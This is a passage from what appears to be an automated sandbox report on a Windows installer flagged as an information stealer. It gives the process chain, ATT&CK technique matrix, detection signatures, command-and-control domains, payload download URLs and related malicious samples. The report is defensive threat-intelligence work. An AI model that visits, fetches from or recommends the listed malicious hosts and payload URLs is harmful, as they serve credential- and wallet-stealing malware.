                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\IVHSHTCODIJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\IVHSHTCODIJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
                Source: Yara matchFile source: 0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.2558937419.000000000419A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.2535381458.000000000419E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Designing.com PID: 6380, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: Designing.com PID: 6380, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00E22263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,12_2_00E22263
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00E21C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,12_2_00E21C61
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                21
                Windows Management Instrumentation
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                1
                Disable or Modify Tools
                2
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                4
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts1
                Native API
                2
                Valid Accounts
                1
                DLL Side-Loading
                11
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol41
                Data from Local System
                11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts2
                Command and Scripting Interpreter
                Logon Script (Windows)2
                Valid Accounts
                2
                Obfuscated Files or Information
                Security Account Manager13
                File and Directory Discovery
                SMB/Windows Admin Shares21
                Input Capture
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts2
                PowerShell
                Login Hook21
                Access Token Manipulation
                1
                DLL Side-Loading
                NTDS37
                System Information Discovery
                Distributed Component Object Model3
                Clipboard Data
                115
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
                Process Injection
                11
                Masquerading
                LSA Secrets241
                Security Software Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                Valid Accounts
                Cached Domain Credentials221
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items221
                Virtualization/Sandbox Evasion
                DCSync4
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation
                Proc Filesystem11
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579539 Sample: Setup.exe Startdate: 22/12/2024 Architecture: WINDOWS Score: 100 38 quantitypitt.click 2->38 40 qebHBVmGmKNLRBMHyOJv.qebHBVmGmKNLRBMHyOJv 2->40 42 2 other IPs or domains 2->42 52 Suricata IDS alerts for network traffic 2->52 54 Found malware configuration 2->54 56 Multi AV Scanner detection for submitted file 2->56 58 7 other signatures 2->58 10 Setup.exe 21 2->10         started        signatures3 process4 process5 12 cmd.exe 2 10->12         started        file6 30 C:\Users\user\AppData\Local\...\Designing.com, PE32 12->30 dropped 60 Drops PE files with a suspicious file extension 12->60 16 Designing.com 12->16         started        20 cmd.exe 2 12->20         started        22 extrac32.exe 19 12->22         started        24 8 other processes 12->24 signatures7 process8 dnsIp9 32 quantitypitt.click 172.67.186.189, 443, 49760, 49766 CLOUDFLARENETUS United States 16->32 34 kliptizq.shop 172.67.191.144, 443, 49846 CLOUDFLARENETUS United States 16->34 36 neqi.shop 194.58.112.174, 443, 49823, 49834 AS-REGRU Russian Federation 16->36 44 Suspicious powershell command line found 16->44 46 Query firmware table information (likely to detect VMs) 16->46 48 Found many strings related to Crypto-Wallets (likely being stolen) 16->48 50 5 other signatures 16->50 26 powershell.exe 7 16->26         started        signatures10 process11 process12 28 conhost.exe 26->28         started       

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Setup.exe7%VirustotalBrowse
                Setup.exe3%ReversingLabs
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\124531\Designing.com0%ReversingLabs
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                NameIPActiveMaliciousAntivirus DetectionReputation
                quantitypitt.click
                172.67.186.189
                truetrue
                  unknown
                  kliptizq.shop
                  172.67.191.144
                  truefalse
                    high
                    neqi.shop
                    194.58.112.174
                    truefalse
                      unknown
                      qebHBVmGmKNLRBMHyOJv.qebHBVmGmKNLRBMHyOJv
                      unknown
                      unknownfalse
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        https://quantitypitt.click/apitrue
                          unknown
                          necklacebudi.latfalse
                            high
                            aspecteirs.latfalse
                              high
                              sustainskelet.latfalse
                                high
                                crosshuaht.latfalse
                                  high
                                  rapeflowwj.latfalse
                                    high
                                    quantitypitt.clicktrue
                                      unknown
                                      energyaffai.latfalse
                                        high
                                        https://kliptizq.shop/int_clp_ldr_sha.txtfalse
                                          unknown
                                          grannyejh.latfalse
                                            high
                                            discokeyus.latfalse
                                              high
                                              NameSourceMaliciousAntivirus DetectionReputation
                                              https://www.cloudflare.com/learning/access-management/phishing-attack/powershell.exe, 00000010.00000002.2797712554.0000000004B01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://duckduckgo.com/chrome_newtabDesigning.com, 0000000C.00000003.2486767432.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2486595683.00000000042F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://duckduckgo.com/ac/?q=Designing.com, 0000000C.00000003.2486767432.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2486595683.00000000042F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://kliptizq.shop/int_clp_ldr_sha.txtCDesigning.com, 0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://kliptizq.shop/int_clp_ldr_sha.txtMDesigning.com, 0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        unknown
                                                        http://ocsps.ssl.com0Setup.exefalse
                                                          high
                                                          https://www.cloudflare.com/learning/access-management/phishhZpowershell.exe, 00000010.00000002.2797712554.0000000004B6F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Designing.com, 0000000C.00000003.2486767432.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2486595683.00000000042F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0Setup.exefalse
                                                                high
                                                                https://kliptizq.shop:443/int_clp_ldr_sha.txtgeDesigning.com, 0000000C.00000002.2789884887.0000000001826000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0_Setup.exefalse
                                                                    high
                                                                    https://www.cloudflare.com/learning/access-management/phishing-attack/class=cf-btnstyle=background-cpowershell.exe, 00000010.00000002.2796253872.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2796376802.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2796376802.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2796376802.000000000094B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2796883993.0000000000BE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://www.autoitscript.com/autoit3/Designing.com, 0000000C.00000003.2438306481.000000000529C000.00000004.00000800.00020000.00000000.sdmp, Distinction.9.dr, Designing.com.2.drfalse
                                                                        high
                                                                        http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0Setup.exefalse
                                                                          high
                                                                          https://neqi.shop/sdgjyut/psh.txtDesigning.com, 0000000C.00000003.2788056081.000000000415E000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000002.2789843944.0000000001807000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            https://aka.ms/pscore6lBpowershell.exe, 00000010.00000002.2797712554.00000000047C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://quantitypitt.click:443/apiDesigning.com, 0000000C.00000002.2789884887.0000000001826000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                http://x1.c.lencr.org/0Designing.com, 0000000C.00000003.2533928879.00000000042C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://x1.i.lencr.org/0Designing.com, 0000000C.00000003.2533928879.00000000042C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.cloudflare.com/learning/access-management/phishpowershell.exe, 00000010.00000002.2797712554.0000000004B6F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchDesigning.com, 0000000C.00000003.2486767432.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2486595683.00000000042F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://www.ssl.com/repository0Setup.exefalse
                                                                                          high
                                                                                          https://www.cloudflare.com/5xx-error-landinghZpowershell.exe, 00000010.00000002.2797712554.0000000004B6F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://support.mozilla.org/products/firefoxgro.allDesigning.com, 0000000C.00000003.2535014422.0000000005EE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000010.00000002.2797712554.00000000047C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://kliptizq.shop/ZDesigning.com, 0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  https://quantitypitt.click:443/apiKDesigning.com, 0000000C.00000002.2789884887.0000000001826000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoDesigning.com, 0000000C.00000003.2486767432.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2486595683.00000000042F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://quantitypitt.click/Designing.com, 0000000C.00000003.2535367064.00000000041ED000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2558937419.00000000041DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        https://www.cloudflare.com/learning/access-management/phishing-atX)powershell.exe, 00000010.00000002.2797712554.0000000004B6F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://quantitypitt.click:443/apiicrosoftDesigning.com, 0000000C.00000002.2789884887.0000000001826000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            https://neqi.shop/Designing.com, 0000000C.00000003.2788056081.000000000415E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Designing.com, 0000000C.00000003.2486767432.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2486595683.00000000042F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://crl.rootca1.amazontrust.com/rootca1.crl0Designing.com, 0000000C.00000003.2533928879.00000000042C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.autoitscript.com/autoit3/XDesigning.com, 0000000C.00000003.2438306481.000000000529C000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000000.2130438108.0000000000E75000.00000002.00000001.01000000.00000006.sdmp, Designing.com.2.dr, Brunette.9.drfalse
                                                                                                                    high
                                                                                                                    http://ocsp.rootca1.amazontrust.com0:Designing.com, 0000000C.00000003.2533928879.00000000042C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://nsis.sf.net/NSIS_ErrorErrorSetup.exefalse
                                                                                                                        high
                                                                                                                        https://quantitypitt.click/apikDesigning.com, 0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          https://www.ecosia.org/newtab/Designing.com, 0000000C.00000003.2486767432.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2486595683.00000000042F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://kliptizq.shop/9Designing.com, 0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brDesigning.com, 0000000C.00000003.2535014422.0000000005EE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://www.cloudflare.com/5xx-error-landingpowershell.exe, 00000010.00000002.2797712554.0000000004B01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://www.cloudflare.com/5xx-error-landingid=brand_linktarget=_blankpowershell.exe, 00000010.00000002.2796253872.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2796376802.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2796376802.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2796376802.000000000094B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2796883993.0000000000BE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://ac.ecosia.org/autocomplete?q=Designing.com, 0000000C.00000003.2486767432.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2486595683.00000000042F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://crt.rootca1.amazontrust.com/rootca1.cer0?Designing.com, 0000000C.00000003.2533928879.00000000042C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://neqi.shop/sdgjyut/psh.txtkDesigning.com, 0000000C.00000003.2788056081.000000000415E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0Setup.exefalse
                                                                                                                                            high
                                                                                                                                            https://quantitypitt.click/%Designing.com, 0000000C.00000003.2558937419.000000000419A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Designing.com, 0000000C.00000003.2486767432.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2486595683.00000000042F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://www.cloudflare.com/5xx-error-landingmancepowershell.exe, 00000010.00000002.2796376802.0000000000980000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs
                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  172.67.186.189
                                                                                                                                                  quantitypitt.clickUnited States
                                                                                                                                                  13335CLOUDFLARENETUStrue
                                                                                                                                                  172.67.191.144
                                                                                                                                                  kliptizq.shopUnited States
                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                  194.58.112.174
                                                                                                                                                  neqi.shopRussian Federation
                                                                                                                                                  197695AS-REGRUfalse
                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                  Analysis ID:1579539
                                                                                                                                                  Start date and time:2024-12-22 23:27:11 +01:00
                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 6m 57s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:full
                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                  Number of analysed new started processes analysed:18
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Sample name:Setup.exe
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@27/26@4/3
                                                                                                                                                  EGA Information:
                                                                                                                                                  • Successful, ratio: 66.7%
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                  • Number of executed functions: 77
                                                                                                                                                  • Number of non-executed functions: 304
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
                                                                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 4676 because it is empty
                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                  TimeTypeDescription
                                                                                                                                                  17:28:07API Interceptor1x Sleep call for process: Setup.exe modified
                                                                                                                                                  17:28:44API Interceptor10x Sleep call for process: Designing.com modified
                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  172.67.191.144setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    'Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                      update_1630227239.dllGet hashmaliciousIcedIDBrowse
                                                                                                                                                        194.58.112.174SWIFT COPY.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                        • www.elinor.club/1ne4/
                                                                                                                                                        Nieuwebestellingen10122024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                        • www.synd.fun/6sgf/
                                                                                                                                                        SRT68.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                        • www.fantastica.digital/5srj/
                                                                                                                                                        72STaC6BmljfbIQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                        • www.elinor.club/1ne4/
                                                                                                                                                        specification and drawing.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                        • www.synd.fun/6sgf/
                                                                                                                                                        Pre Alert PO TVKJEANSA00967.bat.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                        • www.elinor.club/7plr/
                                                                                                                                                        CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                        • www.sklad-iq.online/gdvz/
                                                                                                                                                        CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                        • www.sklad-iq.online/gdvz/
                                                                                                                                                        Item-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • www.sklad-iq.online/j4lg/
                                                                                                                                                        PO AT-5228.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                        • www.marketplacer.top/xprp/
                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        kliptizq.shopsetup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.84.113
                                                                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.84.113
                                                                                                                                                        setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 172.67.191.144
                                                                                                                                                        Set-up.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                        • 104.21.84.113
                                                                                                                                                        'Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                        • 172.67.191.144
                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        CLOUDFLARENETUSloligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                        • 162.158.254.178
                                                                                                                                                        winwidgetshp.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.18.182
                                                                                                                                                        https://cpanel05wh.bkk1.cloud.z.com/~cp197720/open/DD/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                        • 104.21.234.144
                                                                                                                                                        nshkppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                        • 104.24.135.181
                                                                                                                                                        swift-bootstrapper.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 104.18.38.10
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                        • 104.21.67.146
                                                                                                                                                        7394231845.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 104.17.25.14
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                        • 104.21.67.146
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                        • 104.21.63.229
                                                                                                                                                        AS-REGRUSWIFT COPY.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                        • 194.58.112.174
                                                                                                                                                        arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                        • 194.58.59.91
                                                                                                                                                        Nieuwebestellingen10122024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                        • 194.58.112.174
                                                                                                                                                        hax.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                        • 194.58.94.235
                                                                                                                                                        Outstanding Invoices Spreadsheet Scan 00495_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                        • 31.31.198.145
                                                                                                                                                        Revo.Uninstaller.Pro.v5.3.4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 194.87.189.43
                                                                                                                                                        Revo.Uninstaller.Pro.v5.3.4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 194.87.189.43
                                                                                                                                                        cXjy5Y6dXX.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                        • 193.124.205.63
                                                                                                                                                        SRT68.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                        • 194.58.112.174
                                                                                                                                                        New Order.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                        • 31.31.196.17
                                                                                                                                                        CLOUDFLARENETUSloligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                        • 162.158.254.178
                                                                                                                                                        winwidgetshp.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.18.182
                                                                                                                                                        https://cpanel05wh.bkk1.cloud.z.com/~cp197720/open/DD/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                        • 104.21.234.144
                                                                                                                                                        nshkppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                        • 104.24.135.181
                                                                                                                                                        swift-bootstrapper.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 104.18.38.10
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                        • 104.21.67.146
                                                                                                                                                        7394231845.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 104.17.25.14
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                        • 104.21.67.146
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                        • 104.21.63.229
                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        a0e9f5d64349fb13191bc781f81f42e1winwidgetshp.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 172.67.191.144
                                                                                                                                                        • 172.67.186.189
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                        • 172.67.191.144
                                                                                                                                                        • 172.67.186.189
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                        • 172.67.191.144
                                                                                                                                                        • 172.67.186.189
                                                                                                                                                        Solara-3.0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 172.67.191.144
                                                                                                                                                        • 172.67.186.189
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                        • 172.67.191.144
                                                                                                                                                        • 172.67.186.189
                                                                                                                                                        Rechnung736258.pdf.lnkGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 172.67.191.144
                                                                                                                                                        • 172.67.186.189
                                                                                                                                                        Navan - Itinerary.pdf.scr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 172.67.191.144
                                                                                                                                                        • 172.67.186.189
                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        C:\Users\user\AppData\Local\Temp\124531\Designing.comGoldenContinent.exeGet hashmaliciousVidarBrowse
                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                            Full-Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                  Full-Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
